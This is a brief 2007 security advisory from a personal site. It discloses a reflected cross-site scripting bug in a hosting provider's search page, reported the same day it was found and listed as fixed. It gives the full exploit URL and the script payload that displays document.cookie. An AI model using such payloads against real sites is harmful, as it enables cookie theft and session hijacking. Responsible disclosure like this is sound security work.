kanedaaa... ... borys ... bohater ...
slackware - pakiety faqsecuritypublicartprocessinglinux mojetestslinkistatsstart
kaneda@bohater.net

+ Subject:
XSS bug for www.hosting365.com

+ Version:
2007.06.27

+ Discovered by:
Kanedaaa: http://kaneda.bohater.net

+ www.hosting365.com Description:
hosting365 are Ireland's leading Internet Infrastructure Provider. With 30% of the Irish market and over 50,000 customers you can be confident we will surpass your expectations.

+ Description:
XSS IN:
http://www.hosting365.com/search/?q=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&x=0&y=0

Sent data:
<script>alert(document.cookie);</script>



Timeline:
2007.06.27 bug discovered
2007.06.27 bug sent to email from http://www.hosting365.com/support.php
2007.06.27 Fixed

Original Advisory: http://kaneda.bohater.net/security/20070627-xss-hosting365.com.php

Check my other bugs in security section: Security